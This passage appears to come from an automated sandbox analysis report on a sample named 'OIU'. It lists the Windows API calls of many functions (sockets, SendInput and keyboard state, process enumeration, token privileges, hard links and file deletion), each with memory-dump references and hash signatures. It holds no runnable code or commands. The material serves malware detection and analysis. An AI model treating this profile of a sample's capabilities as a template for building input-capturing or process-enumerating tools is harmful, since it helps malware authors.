                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: b4702cf378f53aa95bb79cf43a081dfd58811684d142b3a5a285a42ce76a3115
                                                                      • Instruction ID: 0f0185bf2da40dc6abbc294af2f74fd07e89d7b6f8174882c7899a928b97bfac
                                                                      • Opcode Fuzzy Hash: b4702cf378f53aa95bb79cf43a081dfd58811684d142b3a5a285a42ce76a3115
                                                                      • Instruction Fuzzy Hash: EE514F75A10209EFCF10DF68D881AAE7BB5FF45360F148169F9659B2A0D731EE81CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00C21AFD
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21B0B
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C21B8A
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21B94
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      • Opcode ID: 413e89300a482c6dbc2e5b27f16039314d3ab90c93e92e82b59fe8b83ebb243a
                                                                      • Instruction ID: 34dd0ae74a8f99892c233a5d402ef92c9f7171b543b960df5dadaabfaa34b87f
                                                                      • Opcode Fuzzy Hash: 413e89300a482c6dbc2e5b27f16039314d3ab90c93e92e82b59fe8b83ebb243a
                                                                      • Instruction Fuzzy Hash: B341D274640210AFE720AF24D886F3A77E5AB45718F588488F92A9F7D3D772DD418B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb43fc115f1efda2aa4526e2fdc32c2f6273ef7dc272ce26e137ca6d05ec1dc9
                                                                      • Instruction ID: 35adf8395adfbae753172781870d14cb318d63e08712ae301621d858efa05b09
                                                                      • Opcode Fuzzy Hash: cb43fc115f1efda2aa4526e2fdc32c2f6273ef7dc272ce26e137ca6d05ec1dc9
                                                                      • Instruction Fuzzy Hash: B641C175A00644EFD724EF78C841FAABBE9EB88710F2145AFF551DB382E77199018B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C15783
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C157A9
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C157CE
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C157FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: 59a6ac7422a2270336d9362c51ad612674a1edc29c0dae8ee7c2b536aac3cd8d
                                                                      • Instruction ID: b250cff0909042054e6df5850588749d0bf2ec87618f41908877776d00bf9ab1
                                                                      • Opcode Fuzzy Hash: 59a6ac7422a2270336d9362c51ad612674a1edc29c0dae8ee7c2b536aac3cd8d
                                                                      • Instruction Fuzzy Hash: BD415E35654610DFCB11EF15C495A5EBBE2EF9A320F18C488E85AAB362CB31FD40DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00BC6D71,00000000,00000000,00BC82D9,?,00BC82D9,?,00000001,00BC6D71,8BE85006,00000001,00BC82D9,00BC82D9), ref: 00BDD910
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BDD999
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BDD9AB
                                                                      • __freea.LIBCMT ref: 00BDD9B4
                                                                        • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: 4be2b48f5f414dacc0d758cc473fea8264912934b1064e1fe070091f3b14ae06
                                                                      • Instruction ID: f90f399dd50dc92f926e8b3551826f0670516352f292e06ccabe85aa61e65d2b
                                                                      • Opcode Fuzzy Hash: 4be2b48f5f414dacc0d758cc473fea8264912934b1064e1fe070091f3b14ae06
                                                                      • Instruction Fuzzy Hash: 5831E172A0020AABDF24DF65DC91EAEBBE5EB40310F0502A9FC44D7250EB3ADD50CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00C0ABF1
                                                                      • SetKeyboardState.USER32(00000080), ref: 00C0AC0D
                                                                      • PostMessageW.USER32 ref: 00C0AC74
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00C0ACC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 528ca6048dc14900e78d64a7bbcdfefa3f4d9abdbafb343e5dfdb57a272ff45a
                                                                      • Instruction ID: 28d9d03224f40d0905ffc0acb22d2c500be22e6c4f2514e72eaf62849703ca14
                                                                      • Opcode Fuzzy Hash: 528ca6048dc14900e78d64a7bbcdfefa3f4d9abdbafb343e5dfdb57a272ff45a
                                                                      • Instruction Fuzzy Hash: FE310530A04718AFFF35CB65CC097FE7BA5AB89310F05431AE4A5961D1C3768B85D792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: cb5987ff9894e62bc578704a14dc21af3eb1284c3729f69ed5dd95898b4b7f08
                                                                      • Instruction ID: 3f5ed2dc6eeb21ee92ee50e2c973ab54d037fbd76f82430fa11e0ad702b4c7f5
                                                                      • Opcode Fuzzy Hash: cb5987ff9894e62bc578704a14dc21af3eb1284c3729f69ed5dd95898b4b7f08
                                                                      • Instruction Fuzzy Hash: F84182B4615214EFCB22CF58C895FAD77F5FB4A314F1942A8E9259B261C730A942CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00C316EB
                                                                        • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                                        • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A5E
                                                                        • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00C03A65
                                                                      • GetCaretPos.USER32(?), ref: 00C316FF
                                                                      • ClientToScreen.USER32(00000000,?), ref: 00C3174C
                                                                      • GetForegroundWindow.USER32 ref: 00C31752
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: 8fe41b99b2ce8f7aed3aabfd19ff32e6b42726e7e542d2fb72fc9801b2c28a07
                                                                      • Instruction ID: ef2ccf1c91bd1a1bb693f3af0610933e0873e48032dae4aa165a6c4e6bf166d8
                                                                      • Opcode Fuzzy Hash: 8fe41b99b2ce8f7aed3aabfd19ff32e6b42726e7e542d2fb72fc9801b2c28a07
                                                                      • Instruction Fuzzy Hash: FC315071E14149AFCB00EFA9C8C1DAEBBFDEF49304B5480AAE415E7211DB319E45CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00C0D52F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: d4df14595b2016c7efce9a80acdec77f033b3b4f4257c025870718d384ff7aff
                                                                      • Instruction ID: 31cf465ecb248201f34f7cb62d760e17c47b97dc56c7b52888c4d7e03f5d1813
                                                                      • Opcode Fuzzy Hash: d4df14595b2016c7efce9a80acdec77f033b3b4f4257c025870718d384ff7aff
                                                                      • Instruction Fuzzy Hash: AA31A2711083009FD300EF54CC81BAFBBF8EF9A394F14096DF592961A1EB719A45DBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • GetCursorPos.USER32(?), ref: 00C39001
                                                                      • TrackPopupMenuEx.USER32 ref: 00C39016
                                                                      • GetCursorPos.USER32(?), ref: 00C3905E
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BF7711,?,?,?), ref: 00C39094
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: 671032604aef52b406a374da5eb718b3b43067c39ad9ab3ca45991fcb191253b
                                                                      • Instruction ID: 9962df3fdd35bb8345cf50ff62c3762df20266b21077667121f7ba71c07ee0bb
                                                                      • Opcode Fuzzy Hash: 671032604aef52b406a374da5eb718b3b43067c39ad9ab3ca45991fcb191253b
                                                                      • Instruction Fuzzy Hash: 3721D135610118EFCB298F98CC98FFE3BB9EF49360F044055F91557261C7719A90EB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00C3CB68), ref: 00C0D2FB
                                                                      • GetLastError.KERNEL32 ref: 00C0D30A
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C0D319
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C3CB68), ref: 00C0D376
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: d2dbd6fe5765b7a881bdc36361bddb53e2c1e6670e2245760ab3368c40b71863
                                                                      • Instruction ID: 43b9421a44599c5b424f930376e7fd43dff73720295812526f56aa148edbe27f
                                                                      • Opcode Fuzzy Hash: d2dbd6fe5765b7a881bdc36361bddb53e2c1e6670e2245760ab3368c40b71863
                                                                      • Instruction Fuzzy Hash: 0D219C705083019FC700DF68C8819AEB7F8AE5A764F104A5DF4AAD32E1DB31DA46CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C0102A
                                                                        • Part of subcall function 00C01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C01036
                                                                        • Part of subcall function 00C01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01045
                                                                        • Part of subcall function 00C01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0104C
                                                                        • Part of subcall function 00C01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01062
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C015BE
                                                                      • _memcmp.LIBVCRUNTIME ref: 00C015E1
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C01617
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C0161E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: b91f20ba3d271aafd18b33b20d932ceb4232ba6567bcf07b63f5c88e0f37d320
                                                                      • Instruction ID: 465ae430702812ac6423dd852e38a032985023cbd945223f83b3390c0184fcb5
                                                                      • Opcode Fuzzy Hash: b91f20ba3d271aafd18b33b20d932ceb4232ba6567bcf07b63f5c88e0f37d320
                                                                      • Instruction Fuzzy Hash: 5E216931E00108AFDB14DFA4C985BEEB7B8EF44354F084459E851AB281E731AA45DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00C3280A
                                                                      • SetWindowLongW.USER32 ref: 00C32824
                                                                      • SetWindowLongW.USER32 ref: 00C32832
                                                                      • SetLayeredWindowAttributes.USER32 ref: 00C32840
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 59ad1b82efc54d80cb7988d8c970b07ca76d0748fdc7320fe5edff90f000a1bc
                                                                      • Instruction ID: f6943ed6cb8cb8e74753b45defa50bdd807a799a031c1af2f5fda361df7a4a13
                                                                      • Opcode Fuzzy Hash: 59ad1b82efc54d80cb7988d8c970b07ca76d0748fdc7320fe5edff90f000a1bc
                                                                      • Instruction Fuzzy Hash: 7421D332228111AFDB149B24C895FAA7B95FF46324F148158F4268B6E2C771FD82C791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C0790A,?,000000FF,?,00C08754,00000000,?,0000001C,?,?), ref: 00C08D8C
                                                                        • Part of subcall function 00C08D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00C08DB2
                                                                        • Part of subcall function 00C08D7D: lstrcmpiW.KERNEL32(00000000,?,00C0790A,?,000000FF,?,00C08754,00000000,?,0000001C,?,?), ref: 00C08DE3
                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C08754,00000000,?,0000001C,?,?,00000000), ref: 00C07923
                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00C07949
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C08754,00000000,?,0000001C,?,?,00000000), ref: 00C07984
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: 1665bac605e99197219246467266e9e0b5cd8be50f2b9e124c1e1ee050bd9021
                                                                      • Instruction ID: 036f430289170e3178c43a05ef5b99fc5fb8f567bddf945a25400278e0570f42
                                                                      • Opcode Fuzzy Hash: 1665bac605e99197219246467266e9e0b5cd8be50f2b9e124c1e1ee050bd9021
                                                                      • Instruction Fuzzy Hash: DF11063A200302ABCF156F34DC45E7E77A9FF45350B00412AF842C72A4EB31D911D7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C37D0B
                                                                      • SetWindowLongW.USER32 ref: 00C37D2A
                                                                      • SetWindowLongW.USER32 ref: 00C37D42
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C37D6B
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      • Opcode ID: b49ce03331241c2a792d6e548d436e8aa3189f11156873c369901b3062a0b1d9
                                                                      • Instruction ID: 914d4ebeb63152ef623ed7262d62a489cee38c533a10fceef9b0892cddfe0d23
                                                                      • Opcode Fuzzy Hash: b49ce03331241c2a792d6e548d436e8aa3189f11156873c369901b3062a0b1d9
                                                                      • Instruction Fuzzy Hash: 6E11DF72224654AFCB208F28CC04BAA3BA4AF453B0F258324FD39D72F0D7308A51DB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00C356BB
                                                                      • _wcslen.LIBCMT ref: 00C356CD
                                                                      • _wcslen.LIBCMT ref: 00C356D8
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C35816
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
